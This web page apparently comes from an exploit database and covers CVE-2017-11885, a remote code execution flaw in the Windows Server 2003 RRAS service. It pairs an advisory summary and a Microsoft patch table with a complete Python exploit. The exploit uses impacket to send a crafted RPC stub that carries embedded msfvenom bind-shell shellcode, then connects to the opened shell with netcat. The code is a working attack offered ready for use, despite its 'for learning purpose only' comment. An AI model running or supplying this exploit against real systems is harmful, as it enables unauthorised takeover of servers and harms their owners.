Microsoft Windows 2003 SP2 CVE-2017-11885 – RRAS SMB Remote Code Execution Exploit

Authors:vportal                  Risk:Critical

CVE:CVE-2017-11885              0day:Remote Code Execution

0day -id:0DAY-176176             Date:2018-05-14

Description

A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would need to run a specially crafted application against an RPC server which has Routing and Remote Access enabled. Routing and Remote Access is a non-default configuration; systems without it enabled are not vulnerable.

The security update addresses the vulnerability by correcting how the Routing and Remote Access service handles requests.

 Exploit

#!/usr/bin/env python<font></font>
# -*- coding: utf-8 -*-<font></font>
#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.<font></font>
 <font></font>
#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.<font></font>
#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution.<font></font>
#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using <font></font>
#Windows Server 2003.<font></font>
 <font></font>
#Exploit created by: Víctor Portal<font></font>
#For learning purpose only<font></font>
 <font></font>
import struct<font></font>
import sys<font></font>
import time<font></font>
import os<font></font>
 <font></font>
from threading import Thread    <font></font>
                                 <font></font>
from impacket import smb<font></font>
from impacket import uuid<font></font>
from impacket import dcerpc<font></font>
from impacket.dcerpc.v5 import transport<font></font>
                  <font></font>
target = sys.argv[1]<font></font>
 <font></font>
print '[-]Initiating connection'<font></font>
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)<font></font>
trans.connect()<font></font>
 <font></font>
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target<font></font>
dce = trans.DCERPC_class(trans)<font></font>
 <font></font>
#RRAS DCE-RPC endpoint<font></font>
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))<font></font>
 <font></font>
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python<font></font>
buf =  ""<font></font>
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"<font></font>
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"<font></font>
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"<font></font>
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"<font></font>
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"<font></font>
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"<font></font>
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"<font></font>
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"<font></font>
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"<font></font>
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"<font></font>
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"<font></font>
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"<font></font>
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"<font></font>
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"<font></font>
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"<font></font>
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"<font></font>
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"<font></font>
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"<font></font>
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"<font></font>
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"<font></font>
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"<font></font>
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"<font></font>
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"<font></font>
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"<font></font>
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"<font></font>
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"<font></font>
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"<font></font>
buf += "\xc4\x25\x3d\xe9"<font></font>
 <font></font>
#NDR format<font></font>
stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)<font></font>
stub += "\x10\x27\x00\x00" #dwRoutingPID<font></font>
stub += "\xa4\x86\x01\x00" #dwMibInEntrySize <font></font>
stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer<font></font>
stub += "\x04\x00\x00\x00"  #dwVarID (_MIB_OPAQUE_QUERY)<font></font>
stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)<font></font>
stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize <font></font>
stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)<font></font>
stub +=  "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)<font></font>
stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)<font></font>
stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)<font></font>
 <font></font>
 <font></font>
dce.call(0x1e, stub)   #0x1d MIBEntryGetFirst (other RPC calls are also affected)<font></font>
print "[-]Exploit sent to target successfully..."<font></font>
 <font></font>
print "Waiting for shell..."<font></font>
time.sleep(5)<font></font>
os.system("nc " + target + " 4444")<font></font>
<font></font>

Affected Products

The following software versions or editions are affected. Versions or editions that are not listed are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, see the Microsoft Support Lifecycle.

Product
Platform
Article
Download
Impact
Severity
Supersedence
Windows 10 for 32-bit Systems 4053581 Security Update Remote Code Execution Important 4048956
Windows 10 for x64-based Systems 4053581 Security Update Remote Code Execution Important 4048956
Windows 10 Version 1511 for 32-bit Systems 4053578 Security Update Remote Code Execution Important 4048952
Windows 10 Version 1511 for x64-based Systems 4053578 Security Update Remote Code Execution Important 4048952
Windows 10 Version 1607 for 32-bit Systems 4053579 Security Update Remote Code Execution Important 4048953
Windows 10 Version 1607 for x64-based Systems 4053579 Security Update Remote Code Execution Important 4048953
Windows 10 Version 1703 for 32-bit Systems 4053580 Security Update Remote Code Execution Important 4048954
Windows 10 Version 1703 for x64-based Systems 4053580 Security Update Remote Code Execution Important 4048954
Windows 10 Version 1709 for 32-bit Systems 4054517 Security Update Remote Code Execution Important 4048955
Windows 10 Version 1709 for 64-based Systems 4054517 Security Update Remote Code Execution Important 4048955
Windows 7 for 32-bit Systems Service Pack 1 4054518 Monthly Rollup Remote Code Execution Important 4048957
4054521 Security Only
Windows 7 for x64-based Systems Service Pack 1 4054518 Monthly Rollup Remote Code Execution Important 4048957
4054521 Security Only
Windows 8.1 for 32-bit systems 4054519 Monthly Rollup Remote Code Execution Important 4048958
4054522 Security Only
Windows 8.1 for x64-based systems 4054519 Monthly Rollup Remote Code Execution Important 4048958
4054522 Security Only
Windows RT 8.1 4054519 Monthly Rollup  Remote Code Execution Important 4048958
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) 4052303 Security Update Remote Code Execution Important
Windows Server 2008 for Itanium-Based Systems Service Pack 2 4052303 Security Update Remote Code Execution Important
Windows Server 2008 for x64-based Systems Service Pack 2 4052303 Security Update Remote Code Execution Important
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) 4052303 Security Update Remote Code Execution Important
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 4054518 Monthly Rollup Remote Code Execution Important 4048957
4054521 Security Only
Windows Server 2008 R2 for x64-based Systems Service Pack 1 4054518 Monthly Rollup Remote Code Execution Important 4048957
4054521 Security Only
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) 4054518 Monthly Rollup Remote Code Execution Important 4048957
4054521 Security Only
Windows Server 2012 4054520 Monthly Rollup Remote Code Execution Important 4048959
4054523 Security Only
Windows Server 2012 (Server Core installation) 4054520 Monthly Rollup Remote Code Execution Important 4048959
4054523 Security Only
Windows Server 2012 R2 4054519 Monthly Rollup Remote Code Execution Important 4048958
4054522 Security Only
Windows Server 2012 R2 (Server Core installation) 4054519 Monthly Rollup Remote Code Execution Important 4048958
4054522 Security Only
Windows Server 2016 4053579 Security Update Remote Code Execution Important 4048953
Windows Server 2016 (Server Core installation) 4053579 Security Update Remote Code Execution Important 4048953
Windows Server, version 1709 (Server Core Installation) 4054517 Security Update Remote Code Execution Important 4048955

Mitigations

Microsoft has not identified any mitigating factors for this vulnerability.

 

Workarounds

Microsoft has not identified any workarounds for this vulnerability.

Acknowledgements

Leave a Reply